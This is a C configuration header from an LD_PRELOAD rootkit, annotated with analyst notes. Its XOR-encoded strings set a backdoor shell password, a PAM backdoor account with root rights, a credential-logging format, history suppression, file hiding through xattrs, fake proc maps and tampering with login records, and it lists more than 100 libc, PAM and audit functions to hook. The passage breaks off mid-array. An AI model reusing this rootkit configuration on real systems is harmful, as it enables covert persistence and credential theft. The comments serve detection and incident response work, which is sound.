/*
 *
 * EXAMPLE POPULATED CONST.H HEADER FILE.
 * CONTENTS OF THIS FILE ARE WRITTEN BY CONFIG.PY.
 * PLAINTEXT STRINGS ARE XOR'D.
 *
 * THIS FILE WILL BE OVERWRITTEN DURING INSTALL.
 *
 */

// VALUES PASSED TO CONFIG.PY:
// install_directory = /lib/example_install_directory
// lib_location = $install_directory/example_lib_name.so.\$PLATFORM
// xattr[0] = example_xattr_val_1
// xattr[1] = example_xattr_val_2
// pam_username = example_pam_username
// pam_password = example_pam_password
// pam_port = 6669
// ssl_status = 0
// accept_bd_password = acceptme
// low_port = 98
// high_port = 100
// env_var = LOL
// ptrace_bug_status = 0
// new_preload = /etc/example_new_preload

/*
 * Reading notes for analysts.
 *
 * Every string literal in this header is the plaintext XORed with one
 * constant byte. XORing TERM_ENV_VAR with 0xAC gives "TERM=xterm", and the
 * same byte turns VLANY_USER into the pam_username value listed above. The
 * encoding therefore only hides the text from a plain `strings` pass; a
 * single-byte XOR sweep over the built library recovers all of it.
 *
 * Decoded values quoted in the comments below were obtained that way from
 * this example file. The banner says config.py writes the file at install
 * time, so a deployed copy should be expected to carry other values.
 */

/* Both features are switched off here, matching ssl_status = 0 and
 * ptrace_bug_status = 0 above (presumably that is the mapping; confirm
 * against config.py). */
#undef SSL_BACKDOOR
#undef PTRACE_BUG

/* Numeric marker, stored in the clear. E_SMSG further down decodes to a
 * message containing "MAGIC_GID RESET" and "HIDDEN AGAIN", which ties the
 * hiding logic to this group id; how it is applied is not shown in this
 * header. NOTE(review): a fixed, unusual gid on files or processes is a
 * hunting pivot, but confirm how config.py chooses the value first. */
#define MAGIC_GID 325852479
#define TERM_ENV_VAR "\xf8\xe9\xfe\xe1\x91\xd4\xd8\xc9\xde\xc1"

/* Account material. VLANY_USER decodes to "example_pam_username".
 * VLANY_PASSWORD decodes to a string starting with "$6$", the prefix of a
 * SHA-512 crypt(3) hash, so the header carries a hash of pam_password rather
 * than the password itself. VLANY_PERM decodes to "root". */
#define VLANY_USER "\xc9\xd4\xcd\xc1\xdc\xc0\xc9\xf3\xdc\xcd\xc1\xf3\xd9\xdf\xc9\xde\xc2\xcd\xc1\xc9"
#define VLANY_PASSWORD "\x88\x9a\x88\xe3\xef\xfd\xfa\xe0\xf9\xf8\xda\xeb\xe0\x94\xfe\x88\xcb\xf8\xda\xce\x9c\xe7\xc7\xda\xc6\xfc\xeb\xe6\xc7\xce\xd5\xc0\xc1\xd9\xd8\xfc\xc2\xca\xef\xc7\xca\xe8\xe7\xe0\xc9\x82\x94\xed\xdc\xde\xe0\xc1\x95\xf6\xdc\xd6\xcb\xcb\xef\xc0\xfe\x9e\x99\xe1\xc5\xe2\xc9\xe4\x9e\xef\xfd\xdc\xea\xf9\xe3\xc3\xfe\xe1\xdb\x9a\xe8\xe3\xc3\xc3\xdf\xd9\x9d\xe6\x98\xc3\x9c\xc6\xca\xf5\x82\xe0\xca\xe4\xd9\xf5\xe1\x82"
#define PAM_PORT 6669
#define VLANY_PERM "\xde\xc3\xc3\xd8"

/* HISTFILE decodes to "/dev/null". BASH_RC and SSH_PASSWORDS decode to
 * ".bashrc" and "pam_auth_logs" under /lib/example_install_directory, and
 * LOG_FORMAT decodes to "Username: %s\nPassword: %s\n\n". Together these
 * indicate that captured credentials are written to a file in the install
 * directory (the writing code is not in this header). During response,
 * treat credentials used on an affected host as exposed. */
#define HISTFILE "\x83\xc8\xc9\xda\x83\xc2\xd9\xc0\xc0"
#define BASH_RC "\x83\xc0\xc5\xce\x83\xc9\xd4\xcd\xc1\xdc\xc0\xc9\xf3\xc5\xc2\xdf\xd8\xcd\xc0\xc0\xf3\xc8\xc5\xde\xc9\xcf\xd8\xc3\xde\xd5\x83\x82\xce\xcd\xdf\xc4\xde\xcf"
#define SSH_PASSWORDS "\x83\xc0\xc5\xce\x83\xc9\xd4\xcd\xc1\xdc\xc0\xc9\xf3\xc5\xc2\xdf\xd8\xcd\xc0\xc0\xf3\xc8\xc5\xde\xc9\xcf\xd8\xc3\xde\xd5\x83\xdc\xcd\xc1\xf3\xcd\xd9\xd8\xc4\xf3\xc0\xc3\xcb\xdf"
#define LOG_FORMAT "\xf9\xdf\xc9\xde\xc2\xcd\xc1\xc9\x96\x8c\x89\xdf\xa6\xfc\xcd\xdf\xdf\xdb\xc3\xde\xc8\x96\x8c\x89\xdf\xa6\xa6"

/* Shell settings. SHELL_PASSWORD decodes to "acceptme" (accept_bd_password
 * above), SHELL_TYPE to "/bin/bash", LOGIN to "--login", ENV_VAR to "LOL"
 * (env_var above). */
#define SHELL_PASSWORD "\xcd\xcf\xcf\xc9\xdc\xd8\xc1\xc9"
#define SHELL_NAME "\xda\xc0\xcd\xc2\xd5\xde\xc7"
#define SHELL_TYPE "\x83\xce\xc5\xc2\x83\xce\xcd\xdf\xc4"
#define LOGIN "\x81\x81\xc0\xc3\xcb\xc5\xc2"
#define ENV_VAR "\xe0\xe3\xe0"
#define EXECVE_PW "\xc9\xd4\xcd\xc1\xdc\xc0\xc9\xf3\xc9\xd4\xc9\xcf\xda\xc9\xf3\xdc\xcd\xdf\xdf"
#define TERM "\xf8\xe9\xfe\xe1\x91\xd4\xd8\xc9\xde\xc1"
#define LIB_NAME "\xc9\xd4\xcd\xc1\xdc\xc0\xc9\xf3\xc0\xc5\xce\xf3\xc2\xcd\xc1\xc9\x82\xdf\xc3\x82\x88\xfc\xe0\xed\xf8\xea\xe3\xfe\xe1"
#define PTRACE_BUG_MSG "\xc5\xc3\x9a\xdd\xc4\xe9\xcd\xca\x95\xfd\xe6\xce\xf6\xcb\xff\xd5\xdf\xf8\xfc\xe7\x9b\xd6\xe3\xc2\xff\xcb\x99\xc5\xde\xc8\xdb\xfd\xe7\xe5\xe7\xf9\xfe\xc4\xe7\xf6\x9d\xfb\xcf\xfa\xde\xfd\xcd\x9b\xc6\x9a"

/* Extended-attribute markers. The two strings decode to the xattr[0] and
 * xattr[1] values above, and XATTR further down decodes to "user.%s".
 * Presumably they are combined into attribute names in the user namespace;
 * confirm against the consuming code. */
#define HIDDEN_XATTR_1_STR "\xc9\xd4\xcd\xc1\xdc\xc0\xc9\xf3\xd4\xcd\xd8\xd8\xde\xf3\xda\xcd\xc0\xf3\x9d"
#define HIDDEN_XATTR_2_STR "\xc9\xd4\xcd\xc1\xdc\xc0\xc9\xf3\xd4\xcd\xd8\xd8\xde\xf3\xda\xcd\xc0\xf3\x9e"

/* Operator-facing text: usage and status messages. GID_SET decodes to
 * "SETTING GID TO 0\n"; HIDE_FILE and UNHIDE_FILE decode to "hide" and
 * "unhide". */
#define X_USAGE "\xf9\xdf\xcd\xcb\xc9\x96\x8c\x89\xdf\x8c\xf7\xdc\xdb\xf1\x8c\xf7\x89\xdf\xf1\x8c\xf7\xdc\xc7\xcb\x8c\xc2\xcd\xc1\xc9\xf1\xa6"
#define E_SMSG "\x89\xdf\x8c\xea\xe5\xe2\xe5\xff\xe4\xe9\xe8\x8c\xed\xe2\xe8\x8c\xe1\xed\xeb\xe5\xef\xf3\xeb\xe5\xe8\x8c\xfe\xe9\xff\xe9\xf8\x82\x8c\xb7\xf7\x9d\x97\x9f\x9e\xc1\xfb\xe9\x8b\xfe\xe9\x8c\xe4\xe5\xe8\xe8\xe9\xe2\x8c\xed\xeb\xed\xe5\xe2\xb7\xf7\x9c\xc1\xa6"
#define GID_SET "\xff\xe9\xf8\xf8\xe5\xe2\xeb\x8c\xeb\xe5\xe8\x8c\xf8\xe3\x8c\x9c\xa6"
#define XATTR "\xd9\xdf\xc9\xde\x82\x89\xdf"
#define HIDE_FILE "\xc4\xc5\xc8\xc9"
#define HIDE_USAGE "\xf8\xc4\xc9\x8c\xda\xc0\xcd\xc2\xd5\x8c\xca\xd9\xc2\xcf\xd8\xc5\xc3\xc2\x8c\x8b\xc4\xc5\xc8\xc9\x8b\x8c\xde\xc9\xdd\xd9\xc5\xde\xc9\xdf\x8c\xcd\x8c\xd8\xcd\xde\xcb\xc9\xd8\x8c\xdc\xcd\xd8\xc4\x8c\xd8\xc3\x8c\xc4\xc5\xc8\xc9\x8c\xc5\xc2\x8c\xd8\xc4\xc9\x8c\xdf\xc9\xcf\xc3\xc2\xc8\x8c\xcd\xde\xcb\xd9\xc1\xc9\xc2\xd8\x82\xa6\xf9\xdf\xcd\xcb\xc9\x96\x8c\x82\x83\xc4\xc5\xc8\xc9\x8c\x90\xdc\xcd\xdf\xdf\x92\x8c\x90\xdc\xcd\xd8\xc4\x92\xa6"
#define HIDE_SUCCESS "\xb7\xf7\x9f\x9e\xc1\x89\xdf\x8c\xc4\xc5\xc8\xc8\xc9\xc2\x82\xb7\xf7\x9c\xc1\xa6"
#define UNHIDE_FILE "\xd9\xc2\xc4\xc5\xc8\xc9"
#define UNHIDE_USAGE "\xf8\xc4\xc9\x8c\xda\xc0\xcd\xc2\xd5\x8c\xca\xd9\xc2\xcf\xd8\xc5\xc3\xc2\x8c\x8b\xd9\xc2\xc4\xc5\xc8\xc9\x8b\x8c\xde\xc9\xdd\xd9\xc5\xde\xc9\xdf\x8c\xcd\x8c\xd8\xcd\xde\xcb\xc9\xd8\x8c\xdc\xcd\xd8\xc4\x8c\xd8\xc3\x8c\xd9\xc2\xc4\xc5\xc8\xc9\x8c\xc5\xc2\x8c\xd8\xc4\xc9\x8c\xdf\xc9\xcf\xc3\xc2\xc8\x8c\xcd\xde\xcb\xd9\xc1\xc9\xc2\xd8\x82\xa6\xf9\xdf\xcd\xcb\xc9\x96\x8c\x82\x83\xd9\xc2\xc4\xc5\xc8\xc9\x8c\x90\xdc\xcd\xdf\xdf\x92\x8c\x90\xdc\xcd\xd8\xc4\x92\xa6"
#define UNHIDE_SUCCESS "\xb7\xf7\x9f\x9e\xc1\x89\xdf\x8c\xd9\xc2\xc4\xc5\xc8\xc8\xc9\xc2\x82\xb7\xf7\x9c\xc1\xa6"

/* Shared-object names. LIBC_PATH decodes to "libc.so.6" and LIBPAM_PATH to
 * "libpam.so.0"; LIBDL_PATH follows the same pattern. */
#define LIBC_PATH "\xc0\xc5\xce\xcf\x82\xdf\xc3\x82\x9a"
#define LIBDL_PATH "\xc0\xc5\xce\xc8\xc0\x82\xdf\xc3\x82\x9d"
#define LIBPAM_PATH "\xc0\xc5\xce\xdc\xcd\xc1\x82\xdf\xc3\x82\x9c"

/* Dynamic-loader strings. The three *_ENV_VAR values decode to
 * "LD_TRACE_LOADED_OBJECTS=", "LD_DEBUG=" and "LD_AUDIT=", the loader
 * variables normally used to see which objects get mapped into a process.
 * LD_PRELOAD decodes to "/etc/example_new_preload" (new_preload above) and
 * LD_PRELOAD_ENV to "LD_PRELOAD". LD_LINUX_SO_PATH and LD_SO_PATH decode to
 * glob patterns for the loader binary itself.
 * NOTE(review): a preload list at a non-standard path, next to a pattern
 * for the loader binary, suggests the loader's built-in preload path is
 * being altered; this header does not show that code. Defensively, verify
 * the loader binary against the distribution package's checksum instead of
 * only inspecting the standard preload file. */
#define LD_LINUX_SO_PATH "\x86\x83\x86\xc0\xc8\x81\xc0\xc5\xc2\xd9\xd4\x86\x82\xdf\xc3\x82\x86"
#define LD_SO_PATH "\x86\x83\x86\xc0\xc8\x81\x86\x82\xdf\xc3"
#define LD_TRACE_ENV_VAR "\xe0\xe8\xf3\xf8\xfe\xed\xef\xe9\xf3\xe0\xe3\xed\xe8\xe9\xe8\xf3\xe3\xee\xe6\xe9\xef\xf8\xff\x91"
#define LD_DEBUG_ENV_VAR "\xe0\xe8\xf3\xe8\xe9\xee\xf9\xeb\x91"
#define LD_AUDIT_ENV_VAR "\xe0\xe8\xf3\xed\xf9\xe8\xe5\xf8\x91"
#define LD_AUDIT_GETENV "\xe0\xe8\xf3\xed\xf9\xe8\xe5\xf8"
#define HELP "\xc4\xc9\xc0\xdc"
#define LD_PRELOAD "\x83\xc9\xd8\xcf\x83\xc9\xd4\xcd\xc1\xdc\xc0\xc9\xf3\xc2\xc9\xdb\xf3\xdc\xde\xc9\xc0\xc3\xcd\xc8"
#define LD_PRELOAD_ETC "\xc9\xd4\xcd\xc1\xdc\xc0\xc9\xf3\xc2\xc9\xdb\xf3\xdc\xde\xc9\xc0\xc3\xcd\xc8"
#define LD_PRELOAD_ENV "\xe0\xe8\xf3\xfc\xfe\xe9\xe0\xe3\xed\xe8"

/* Install location. INSTALL_DIR decodes to "/lib/example_install_directory"
 * and LIB_LOCATION to that directory plus the LIB_NAME value. */
#define INSTALL "\xc9\xd4\xcd\xc1\xdc\xc0\xc9\xf3\xc5\xc2\xdf\xd8\xcd\xc0\xc0\xf3\xc8\xc5\xde\xc9\xcf\xd8\xc3\xde\xd5"
#define INSTALL_DIR "\x83\xc0\xc5\xce\x83\xc9\xd4\xcd\xc1\xdc\xc0\xc9\xf3\xc5\xc2\xdf\xd8\xcd\xc0\xc0\xf3\xc8\xc5\xde\xc9\xcf\xd8\xc3\xde\xd5"
#define LIB_LOCATION "\x83\xc0\xc5\xce\x83\xc9\xd4\xcd\xc1\xdc\xc0\xc9\xf3\xc5\xc2\xdf\xd8\xcd\xc0\xc0\xf3\xc8\xc5\xde\xc9\xcf\xd8\xc3\xde\xd5\x83\xc9\xd4\xcd\xc1\xdc\xc0\xc9\xf3\xc0\xc5\xce\xf3\xc2\xcd\xc1\xc9\x82\xdf\xc3\x82\x88\xfc\xe0\xed\xf8\xea\xe3\xfe\xe1"

/* procfs paths. PROC_NET_TCP and PROC_NET_TCP6 decode to "/proc/net/tcp"
 * and "/proc/net/tcp6"; PROC_NET_STRING decodes to what looks like a
 * scanf-style format with the field layout of a row in those files.
 * MAPS_PATH decodes to "/proc/%d/maps" and FAKEMAPS_FILE to
 * "/tmp/%d.fakemaps", which points at per-process substitute copies of the
 * maps file being produced (presumably served in place of the real one;
 * confirm). Files matching that /tmp pattern are a host indicator for
 * builds that keep this default. */
#define PROC_NET_TCP "\x83\xdc\xde\xc3\xcf\x83\xc2\xc9\xd8\x83\xd8\xcf\xdc"
#define PROC_NET_TCP6 "\x83\xdc\xde\xc3\xcf\x83\xc2\xc9\xd8\x83\xd8\xcf\xdc\x9a"
#define PROC_NET_STRING "\x89\xc8\x96\x8c\x89\x9a\x98\xf7\x9c\x81\x95\xed\x81\xea\xcd\x81\xca\xf1\x96\x89\xf4\x8c\x89\x9a\x98\xf7\x9c\x81\x95\xed\x81\xea\xcd\x81\xca\xf1\x96\x89\xf4\x8c\x89\xf4\x8c\x89\xc0\xf4\x96\x89\xc0\xf4\x8c\x89\xf4\x96\x89\xc0\xf4\x8c\x89\xc0\xf4\x8c\x89\xc8\x8c\x89\xc8\x8c\x89\xc0\xd9\x8c\x89\x99\x9d\x9e\xdf\xf0\xc2"
#define PROC_PATH "\x83\xdc\xde\xc3\xcf\x83"
#define PROC_ID "\x83\xdc\xde\xc3\xcf\x83\x89\xdf"
#define MAPS_PATH "\x83\xdc\xde\xc3\xcf\x83\x89\xc8\x83\xc1\xcd\xdc\xdf"
#define FAKEMAPS_FILE "\x83\xd8\xc1\xdc\x83\x89\xc8\x82\xca\xcd\xc7\xc9\xc1\xcd\xdc\xdf"
#define S_FSIZE 625824
#define ENV_LINE "\x89\xdf\x83\xc9\xc2\xda\xc5\xde\xc3\xc2"
#define CMD_LINE "\x89\xdf\x83\xcf\xc1\xc8\xc0\xc5\xc2\xc9"
#define CMDLINE_SELF "\x83\xdc\xde\xc3\xcf\x83\xdf\xc9\xc0\xca\x83\xcf\xc1\xc8\xc0\xc5\xc2\xc9"
#define BASH "\x83\xce\xc5\xc2\x83\xce\xcd\xdf\xc4\x8c\x81\x81\xc0\xc3\xcb\xc5\xc2"

/* Login-record files: "/var/log/wtmp", "/var/run/utmp" and
 * "/var/log/lastlog". Their presence here means session records read on an
 * affected host cannot be relied on; prefer copies forwarded off-host. */
#define _WTMP_FILE "\x83\xda\xcd\xde\x83\xc0\xc3\xcb\x83\xdb\xd8\xc1\xdc"
#define _UTMP_FILE "\x83\xda\xcd\xde\x83\xde\xd9\xc2\x83\xd9\xd8\xc1\xdc"
#define LASTLOG "\x83\xda\xcd\xde\x83\xc0\xc3\xcb\x83\xc0\xcd\xdf\xd8\xc0\xc3\xcb"
#define FAKE_LASTLOG_FILE "\x99"

/* Port range from low_port / high_port above; stored in the clear. */
#define LOW_PORT 98
#define HIGH_PORT 100

/* TLS-related strings. SSL_CIPHER_LIST decodes to an OpenSSL-style cipher
 * string; the remaining three decode to the X.509 field names
 * "subjectAltName", "nsComment" and "commonName". */
#define SSL_CIPHER_LIST "\xed\xe0\xe0\x96\x8d\xed\xe8\xe4\x96\x8d\xe0\xe3\xfb\x96\x8d\xe9\xf4\xfc\x96\x8d\xe1\xe8\x99\x96\xec\xff\xf8\xfe\xe9\xe2\xeb\xf8\xe4"
#define SUBJECT_ALT_NAME "\xdf\xd9\xce\xc6\xc9\xcf\xd8\xed\xc0\xd8\xe2\xcd\xc1\xc9"
#define NS_COMMENT "\xc2\xdf\xef\xc3\xc1\xc1\xc9\xc2\xd8"
#define COMMON_NAME "\xcf\xc3\xc1\xc1\xc3\xc2\xe2\xcd\xc1\xc9"
/*
 * Reading notes for analysts (this part of the header).
 *
 * String literals here are the plaintext XORed with the single byte 0xAC:
 * calls[0] below decodes to "rename", matching CRENAME. The decoded names in
 * the trailing comments were obtained that way. Numeric constants are stored
 * in the clear.
 */

/* Certificate parameters. COMMON_NAME_HOST decodes to "localhost", DNS to
 * "DNS:" and CERTIFICATE_COMMENT to "auto". These presumably feed a
 * self-signed certificate for the SSL_BACKDOOR feature, which the top of the
 * file #undefs in this example; confirm against the consuming code. */
#define COMMON_NAME_HOST "\xc0\xc3\xcf\xcd\xc0\xc4\xc3\xdf\xd8"
#define DNS "\xe8\xe2\xff\x96"
#define DEFAULT_KEY_BITS 1024
#define DEFAULT_CERT_DURATION 31536000
#define CERTIFICATE_COMMENT "\xcd\xd9\xd8\xc3"
#define DEFAULT_TCP_BUF_LEN 8192
#define MAX_LEN 4125

/* Indices into calls[] below: entry C<NAME> holds the encoded symbol name
 * <name>. _CSIZE is the array length. */
#define CRENAME 0
#define CRENAMEAT 1
#define CRENAMEAT2 2
#define CFREAD 3
#define CSTAT 4
#define CSTAT64 5
#define CFSTAT 6
#define CFSTAT64 7
#define CFSTATAT 8
#define CFSTATAT64 9
#define CLSTAT 10
#define CLSTAT64 11
#define C__LXSTAT 12
#define C__LXSTAT64 13
#define C__FXSTAT 14
#define C__FXSTAT64 15
#define C__XSTAT 16
#define C__XSTAT64 17
#define CFGETS 18
#define CFGETFLAGS 19
#define CFSETFLAGS 20
#define CPTRACE 21
#define CFWRITE 22
#define CFWRITE_UNLOCKED 23
#define CFPUTS_UNLOCKED 24
#define CEXECVE 25
#define CEXECVP 26
#define CLINK 27
#define CLINKAT 28
#define CUNLINK 29
#define CUNLINKAT 30
#define CSYMLINK 31
#define CSYMLINKAT 32
#define CMKDIR 33
#define CMKDIRAT 34
#define CRMDIR 35
#define COPENDIR 36
#define COPENDIR64 37
#define CFDOPENDIR 38
#define CREADDIR 39
#define CREADDIR64 40
#define CCHDIR 41
#define CFCHDIR 42
#define CACCESS 43
#define COPEN 44
#define COPEN64 45
#define CFOPEN 46
#define CFOPEN64 47
#define CCREAT 48
#define CMKSTEMP 49
#define CACCEPT 50
#define CSETGID 51
#define CSETREGID 52
#define CSETRESGID 53
#define CPAM_AUTHENTICATE 54
#define CPAM_OPEN_SESSION 55
#define CPAM_ACCT_MGMT 56
#define CGETPWNAM_R 57
#define CGETPWNAM 58
#define CGETSPNAM 59
#define CGETPWUID 60
#define CKILL 61
#define CCHMOD 62
#define CCHOWN 63
#define CFCHMOD 64
#define CFCHOWN 65
#define CFCHOWNAT 66
#define CLCHOWN 67
#define CLISTXATTR 68
#define CLLISTXATTR 69
#define CFLISTXATTR 70
#define CGETXATTR 71
#define CLGETXATTR 72
#define CFGETXATTR 73
#define CSETXATTR 74
#define CLSETXATTR 75
#define CFSETXATTR 76
#define CREMOVEXATTR 77
#define CLREMOVEXATTR 78
#define CFREMOVEXATTR 79
#define CAUDIT_LOG_ACCT_MESSAGE 80
#define CAUDIT_LOG_USER_MESSAGE 81
#define CAUDIT_SEND 82
#define CGETUTENT 83
#define CGETUTXENT 84
#define CPUTUTLINE 85
#define CPCAP_LOOP 86
#define CGETPWENT 87
#define CSYSLOG 88
#define C__SYSLOG_CHK 89
#define CDLADDR 90
#define CDLINFO 91
#define CDLSYM 92
#define CSOCKET 93
#define CLOGIN 94
#define CSETEGID 95
#define CPUTUTXLINE 96
#define CGETUTID 97
#define CGETUTXID 98
#define CGETUTMP 99
#define CGETUTMPX 100
#define CUPDWTMP 101
#define CUPDWTMPX 102
#define _CSIZE 103

/*
 * Encoded names of the library functions this project refers to by index.
 * Read as a coverage map, the list says which user-space views may be
 * altered on a host where the library is loaded: directory listing and
 * stat, open/fopen, ownership and xattr calls, utmp/wtmp access, PAM,
 * passwd/shadow lookups, syslog and audit logging, pcap_loop, and the dl*
 * family itself. If these are dynamic-linker interpositions, as the HOOK
 * macro at the end of the file suggests, then a statically linked tool or
 * an offline image of the disk does not pass through them.
 */
static char *calls[_CSIZE] = {
    "\xde\xc9\xc2\xcd\xc1\xc9", /* rename */
    "\xde\xc9\xc2\xcd\xc1\xc9\xcd\xd8", /* renameat */
    "\xde\xc9\xc2\xcd\xc1\xc9\xcd\xd8\x9e", /* renameat2 */
    "\xca\xde\xc9\xcd\xc8", /* fread */
    "\xdf\xd8\xcd\xd8", /* stat */
    "\xdf\xd8\xcd\xd8\x9a\x98", /* stat64 */
    "\xca\xdf\xd8\xcd\xd8", /* fstat */
    "\xca\xdf\xd8\xcd\xd8\x9a\x98", /* fstat64 */
    "\xca\xdf\xd8\xcd\xd8\xcd\xd8", /* fstatat */
    "\xca\xdf\xd8\xcd\xd8\xcd\xd8\x9a\x98", /* fstatat64 */
    "\xc0\xdf\xd8\xcd\xd8", /* lstat */
    "\xc0\xdf\xd8\xcd\xd8\x9a\x98", /* lstat64 */
    "\xf3\xf3\xc0\xd4\xdf\xd8\xcd\xd8", /* __lxstat */
    "\xf3\xf3\xc0\xd4\xdf\xd8\xcd\xd8\x9a\x98", /* __lxstat64 */
    "\xf3\xf3\xca\xd4\xdf\xd8\xcd\xd8", /* __fxstat */
    "\xf3\xf3\xca\xd4\xdf\xd8\xcd\xd8\x9a\x98", /* __fxstat64 */
    "\xf3\xf3\xd4\xdf\xd8\xcd\xd8", /* __xstat */
    "\xf3\xf3\xd4\xdf\xd8\xcd\xd8\x9a\x98", /* __xstat64 */
    "\xca\xcb\xc9\xd8\xdf", /* fgets */
    "\xca\xcb\xc9\xd8\xca\xc0\xcd\xcb\xdf", /* fgetflags */
    "\xca\xdf\xc9\xd8\xca\xc0\xcd\xcb\xdf", /* fsetflags */
    "\xdc\xd8\xde\xcd\xcf\xc9", /* ptrace */
    "\xca\xdb\xde\xc5\xd8\xc9", /* fwrite */
    "\xca\xdb\xde\xc5\xd8\xc9\xf3\xd9\xc2\xc0\xc3\xcf\xc7\xc9\xc8", /* fwrite_unlocked */
    "\xca\xdc\xd9\xd8\xdf\xf3\xd9\xc2\xc0\xc3\xcf\xc7\xc9\xc8", /* fputs_unlocked */
    "\xc9\xd4\xc9\xcf\xda\xc9", /* execve */
    "\xc9\xd4\xc9\xcf\xda\xdc", /* execvp */
    "\xc0\xc5\xc2\xc7", /* link */
    "\xc0\xc5\xc2\xc7\xcd\xd8", /* linkat */
    "\xd9\xc2\xc0\xc5\xc2\xc7", /* unlink */
    "\xd9\xc2\xc0\xc5\xc2\xc7\xcd\xd8", /* unlinkat */
    "\xdf\xd5\xc1\xc0\xc5\xc2\xc7", /* symlink */
    "\xdf\xd5\xc1\xc0\xc5\xc2\xc7\xcd\xd8", /* symlinkat */
    "\xc1\xc7\xc8\xc5\xde", /* mkdir */
    "\xc1\xc7\xc8\xc5\xde\xcd\xd8", /* mkdirat */
    "\xde\xc1\xc8\xc5\xde", /* rmdir */
    "\xc3\xdc\xc9\xc2\xc8\xc5\xde", /* opendir */
    "\xc3\xdc\xc9\xc2\xc8\xc5\xde\x9a\x98", /* opendir64 */
    "\xca\xc8\xc3\xdc\xc9\xc2\xc8\xc5\xde", /* fdopendir */
    "\xde\xc9\xcd\xc8\xc8\xc5\xde", /* readdir */
    "\xde\xc9\xcd\xc8\xc8\xc5\xde\x9a\x98", /* readdir64 */
    "\xcf\xc4\xc8\xc5\xde", /* chdir */
    "\xca\xcf\xc4\xc8\xc5\xde", /* fchdir */
    "\xcd\xcf\xcf\xc9\xdf\xdf", /* access */
    "\xc3\xdc\xc9\xc2", /* open */
    "\xc3\xdc\xc9\xc2\x9a\x98", /* open64 */
    "\xca\xc3\xdc\xc9\xc2", /* fopen */
    "\xca\xc3\xdc\xc9\xc2\x9a\x98", /* fopen64 */
    "\xcf\xde\xc9\xcd\xd8", /* creat */
    "\xc1\xc7\xdf\xd8\xc9\xc1\xdc", /* mkstemp */
    "\xcd\xcf\xcf\xc9\xdc\xd8", /* accept */
    "\xdf\xc9\xd8\xcb\xc5\xc8", /* setgid */
    "\xdf\xc9\xd8\xde\xc9\xcb\xc5\xc8", /* setregid */
    "\xdf\xc9\xd8\xde\xc9\xdf\xcb\xc5\xc8", /* setresgid */
    "\xdc\xcd\xc1\xf3\xcd\xd9\xd8\xc4\xc9\xc2\xd8\xc5\xcf\xcd\xd8\xc9", /* pam_authenticate */
    "\xdc\xcd\xc1\xf3\xc3\xdc\xc9\xc2\xf3\xdf\xc9\xdf\xdf\xc5\xc3\xc2", /* pam_open_session */
    "\xdc\xcd\xc1\xf3\xcd\xcf\xcf\xd8\xf3\xc1\xcb\xc1\xd8", /* pam_acct_mgmt */
    "\xcb\xc9\xd8\xdc\xdb\xc2\xcd\xc1\xf3\xde", /* getpwnam_r */
    "\xcb\xc9\xd8\xdc\xdb\xc2\xcd\xc1", /* getpwnam */
    "\xcb\xc9\xd8\xdf\xdc\xc2\xcd\xc1", /* getspnam */
    "\xcb\xc9\xd8\xdc\xdb\xd9\xc5\xc8", /* getpwuid */
    "\xc7\xc5\xc0\xc0", /* kill */
    "\xcf\xc4\xc1\xc3\xc8", /* chmod */
    "\xcf\xc4\xc3\xdb\xc2", /* chown */
    "\xca\xcf\xc4\xc1\xc3\xc8", /* fchmod */
    "\xca\xcf\xc4\xc3\xdb\xc2", /* fchown */
    "\xca\xcf\xc4\xc3\xdb\xc2\xcd\xd8", /* fchownat */
    "\xc0\xcf\xc4\xc3\xdb\xc2", /* lchown */
    "\xc0\xc5\xdf\xd8\xd4\xcd\xd8\xd8\xde", /* listxattr */
    "\xc0\xc0\xc5\xdf\xd8\xd4\xcd\xd8\xd8\xde", /* llistxattr */
    "\xca\xc0\xc5\xdf\xd8\xd4\xcd\xd8\xd8\xde", /* flistxattr */
    "\xcb\xc9\xd8\xd4\xcd\xd8\xd8\xde", /* getxattr */
    "\xc0\xcb\xc9\xd8\xd4\xcd\xd8\xd8\xde", /* lgetxattr */
    "\xca\xcb\xc9\xd8\xd4\xcd\xd8\xd8\xde", /* fgetxattr */
    "\xdf\xc9\xd8\xd4\xcd\xd8\xd8\xde", /* setxattr */
    "\xc0\xdf\xc9\xd8\xd4\xcd\xd8\xd8\xde", /* lsetxattr */
    "\xca\xdf\xc9\xd8\xd4\xcd\xd8\xd8\xde", /* fsetxattr */
    "\xde\xc9\xc1\xc3\xda\xc9\xd4\xcd\xd8\xd8\xde", /* removexattr */
    "\xc0\xde\xc9\xc1\xc3\xda\xc9\xd4\xcd\xd8\xd8\xde", /* lremovexattr */
    "\xca\xde\xc9\xc1\xc3\xda\xc9\xd4\xcd\xd8\xd8\xde", /* fremovexattr */
    "\xcd\xd9\xc8\xc5\xd8\xf3\xc0\xc3\xcb\xf3\xcd\xcf\xcf\xd8\xf3\xc1\xc9\xdf\xdf\xcd\xcb\xc9", /* audit_log_acct_message */
    "\xcd\xd9\xc8\xc5\xd8\xf3\xc0\xc3\xcb\xf3\xd9\xdf\xc9\xde\xf3\xc1\xc9\xdf\xdf\xcd\xcb\xc9", /* audit_log_user_message */
    "\xcd\xd9\xc8\xc5\xd8\xf3\xdf\xc9\xc2\xc8", /* audit_send */
    "\xcb\xc9\xd8\xd9\xd8\xc9\xc2\xd8", /* getutent */
    "\xcb\xc9\xd8\xd9\xd8\xd4\xc9\xc2\xd8", /* getutxent */
    "\xdc\xd9\xd8\xd9\xd8\xc0\xc5\xc2\xc9", /* pututline */
    "\xdc\xcf\xcd\xdc\xf3\xc0\xc3\xc3\xdc", /* pcap_loop */
    "\xcb\xc9\xd8\xdc\xdb\xc9\xc2\xd8", /* getpwent */
    "\xdf\xd5\xdf\xc0\xc3\xcb", /* syslog */
    "\xf3\xf3\xdf\xd5\xdf\xc0\xc3\xcb\xf3\xcf\xc4\xc7", /* __syslog_chk */
    "\xc8\xc0\xcd\xc8\xc8\xde", /* dladdr */
    "\xc8\xc0\xc5\xc2\xca\xc3", /* dlinfo */
    "\xc8\xc0\xdf\xd5\xc1", /* dlsym */
    "\xdf\xc3\xcf\xc7\xc9\xd8", /* socket */
    "\xc0\xc3\xcb\xc5\xc2", /* login */
    "\xdf\xc9\xd8\xc9\xcb\xc5\xc8", /* setegid */
    "\xdc\xd9\xd8\xd9\xd8\xd4\xc0\xc5\xc2\xc9", /* pututxline */
    "\xcb\xc9\xd8\xd9\xd8\xc5\xc8", /* getutid */
    "\xcb\xc9\xd8\xd9\xd8\xd4\xc5\xc8", /* getutxid */
    "\xcb\xc9\xd8\xd9\xd8\xc1\xdc", /* getutmp */
    "\xcb\xc9\xd8\xd9\xd8\xc1\xdc\xd4", /* getutmpx */
    "\xd9\xdc\xc8\xdb\xd8\xc1\xdc", /* updwtmp */
